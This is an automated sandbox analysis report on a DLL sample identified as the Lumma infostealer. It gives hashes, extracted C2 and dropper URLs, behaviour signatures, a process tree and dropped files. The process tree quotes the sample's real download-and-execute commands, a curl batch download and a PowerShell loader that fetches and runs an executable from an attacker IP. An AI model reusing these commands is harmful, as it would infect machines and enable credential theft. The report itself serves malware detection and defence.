Analysis

  • max time kernel
    93s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-01-2025 18:51

General

  • Target

    b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll

  • Size

    80KB

  • MD5

    07fd51e1e8368144ea403137a671b84c

  • SHA1

    b41a78c43c5bf58f6664cb455130c9501c370f05

  • SHA256

    b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f

  • SHA512

    854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7

  • SSDEEP

    1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://147.45.44.131/infopage/ioubcs.exe

exe.dropper

http://147.45.44.131/infopage/ioubcs.exe

Extracted

Family

lumma

C2

https://factlosserk.click/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\SysWOW64\curl.exe
          curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
          4⤵
            PID:4608
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K AppS.bat
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4140
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uakuedc2\uakuedc2.cmdline"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4564
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88C7.tmp" "c:\Users\Admin\AppData\Local\Temp\uakuedc2\CSC4EA348C9CA1E49F59ED6FAB9BBF6EA6F.TMP"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1376
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4448

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES88C7.tmp

      Filesize

      1KB

      MD5

      a658940183fa3f3a9207533488ebccb8

      SHA1

      9fad52a76783fbf5a68bbd07c78eb6679e25c4c8

      SHA256

      7a36335299fbd0d202b6aefb6e131c443622c05e3aac407d585d433e127964f1

      SHA512

      caa02fd64f3a963a843dd834e5449de40212a580cbeb86a99f861062c6cb2c48a6e73d67382b4fac29cf81435b48f5536924f6c68ac1b2a815db19252c5d037e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dep1lile.isa.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\uakuedc2\uakuedc2.dll

      Filesize

      9KB

      MD5

      8523bff1ae79a19b82296569be121789

      SHA1

      9b4bf437b87c2cbd2b70c2a44ff9c40a0ee4d20c

      SHA256

      0ef01db61f23defe8ced0d866fbe7e5a14fed106482662e75f47790bae6f4fc4

      SHA512

      b7c137a7d28ba6ec66180088060172024bc266d7caf4f5c61acb4414c990106f60edd64cf5a79c0f32b2c74e46f06b2fa1b35abcb1451dd51855679bf3a059ac

    • C:\Windows\Temp\AppS.bat

      Filesize

      5KB

      MD5

      244582a493f376d9c0f5672292d11ff2

      SHA1

      95e5011b114869175aebca27f73b11a9b0a2360b

      SHA256

      ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87

      SHA512

      59e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41

    • \??\c:\Users\Admin\AppData\Local\Temp\uakuedc2\CSC4EA348C9CA1E49F59ED6FAB9BBF6EA6F.TMP

      Filesize

      652B

      MD5

      0f4eee3637957bdef27da9c754fa7cdb

      SHA1

      63f62b77471ab0b4b08d1a5744053b404b462b6d

      SHA256

      8bb0dc1313f5ebe70afcb7524b0555633939832208062cd00700926fd717d2c2

      SHA512

      aee3aa9e48bb1463463e3db7440d293dae00c09e271046ceaa3baabc61e578f71269c266ad4049b9e8a098c7bacccf5f651818eb10ff44d5af46be84e651e85b

    • \??\c:\Users\Admin\AppData\Local\Temp\uakuedc2\uakuedc2.0.cs

      Filesize

      10KB

      MD5

      9a280bef5048674eed1b619db8e0c654

      SHA1

      f849de0496358992d1c0d40562da1aaede680453

      SHA256

      84a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30

      SHA512

      6a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f

    • \??\c:\Users\Admin\AppData\Local\Temp\uakuedc2\uakuedc2.cmdline

      Filesize

      204B

      MD5

      ebb0e04e7cd48733872fd2ab28daa9d5

      SHA1

      509478c3151530097d64453322bb85c6bf599602

      SHA256

      9176dc5dbf3b74fcd9b8daba2919fc169069b6199eab50f63ba0f494ac68661f

      SHA512

      56a0062cb700f17c9a7b8c922ec61ce09761c2e44e09118e8b0e12f8ccf2b46541f866914e5848f410c04238bacaeb990daeeae1a038eac2196a5e4d69692257

    • memory/4140-8-0x0000000005E10000-0x0000000005E76000-memory.dmp

      Filesize

      408KB

    • memory/4140-4-0x0000000074A20000-0x00000000751D0000-memory.dmp

      Filesize

      7.7MB

    • memory/4140-18-0x0000000005E80000-0x00000000061D4000-memory.dmp

      Filesize

      3.3MB

    • memory/4140-20-0x0000000006460000-0x00000000064AC000-memory.dmp

      Filesize

      304KB

    • memory/4140-19-0x0000000006440000-0x000000000645E000-memory.dmp

      Filesize

      120KB

    • memory/4140-21-0x0000000007B60000-0x00000000081DA000-memory.dmp

      Filesize

      6.5MB

    • memory/4140-22-0x0000000006930000-0x000000000694A000-memory.dmp

      Filesize

      104KB

    • memory/4140-23-0x00000000069F0000-0x00000000069FE000-memory.dmp

      Filesize

      56KB

    • memory/4140-6-0x0000000005460000-0x0000000005482000-memory.dmp

      Filesize

      136KB

    • memory/4140-7-0x0000000005DA0000-0x0000000005E06000-memory.dmp

      Filesize

      408KB

    • memory/4140-5-0x0000000005670000-0x0000000005C98000-memory.dmp

      Filesize

      6.2MB

    • memory/4140-3-0x0000000002E30000-0x0000000002E66000-memory.dmp

      Filesize

      216KB

    • memory/4140-2-0x0000000074A2E000-0x0000000074A2F000-memory.dmp

      Filesize

      4KB

    • memory/4140-36-0x0000000005150000-0x0000000005158000-memory.dmp

      Filesize

      32KB

    • memory/4140-42-0x0000000074A20000-0x00000000751D0000-memory.dmp

      Filesize

      7.7MB

    • memory/4448-38-0x0000000000400000-0x000000000045A000-memory.dmp

      Filesize

      360KB

    • memory/4448-39-0x0000000000400000-0x000000000045A000-memory.dmp

      Filesize

      360KB